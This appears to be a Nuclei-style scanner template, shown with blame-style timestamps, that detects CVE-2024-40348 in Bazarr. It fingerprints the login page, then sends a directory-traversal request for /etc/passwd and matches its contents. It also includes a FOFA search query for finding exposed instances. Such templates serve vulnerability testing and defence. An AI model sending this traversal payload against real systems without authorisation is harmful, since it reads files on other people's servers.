2024-07-22 09:32:24 +00:00
|
|
|
id: CVE-2024-40348
|
2024-07-18 18:52:31 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Bazarr < 1.4.3 - Arbitrary File Read
|
|
|
|
author: securityforeveryone
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
|
|
|
|
reference:
|
2024-07-21 08:51:48 +00:00
|
|
|
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
|
2024-07-18 18:52:31 +00:00
|
|
|
- https://www.bazarr.media/
|
2024-07-22 09:32:24 +00:00
|
|
|
- https://github.com/bigb0x/CVE-2024-40348
|
|
|
|
classification:
|
|
|
|
epss-score: 0.00043
|
|
|
|
epss-percentile: 0.09329
|
2024-07-18 18:52:31 +00:00
|
|
|
metadata:
|
2024-07-23 07:20:21 +00:00
|
|
|
verified: true
|
|
|
|
max-request: 2
|
2024-07-18 18:52:31 +00:00
|
|
|
vendor: morpheus65535
|
|
|
|
product: bazarr
|
|
|
|
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
|
2024-07-22 09:34:07 +00:00
|
|
|
tags: cve,cve2024,bazarr,lfi
|
2024-07-21 08:51:48 +00:00
|
|
|
|
2024-07-18 18:52:31 +00:00
|
|
|
flow: http(1) && http(2)
|
|
|
|
|
|
|
|
http:
|
2024-07-23 07:20:21 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/login"
|
2024-07-18 18:52:31 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2024-07-21 08:51:48 +00:00
|
|
|
part: body
|
2024-07-18 18:52:31 +00:00
|
|
|
words:
|
|
|
|
- '<title>Bazarr</title>'
|
2024-07-23 07:20:21 +00:00
|
|
|
- 'content="Bazarr'
|
|
|
|
- 'window.Bazarr'
|
|
|
|
condition: or
|
2024-07-18 18:52:31 +00:00
|
|
|
internal: true
|
|
|
|
|
2024-07-23 07:20:21 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
|
2024-07-18 18:52:31 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/octet-stream"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-07-23 07:25:47 +00:00
|
|
|
# digest: 4b0a00483046022100c128400c428439af0515a4dcba55a151ea17919dc89be9512d17c913f651688b022100f867f890a69f2d0defc36e8eeddd85d923759f1db9f56bafeaffebbd039531cc:922c64590222798bb761d5b6d8e72950
|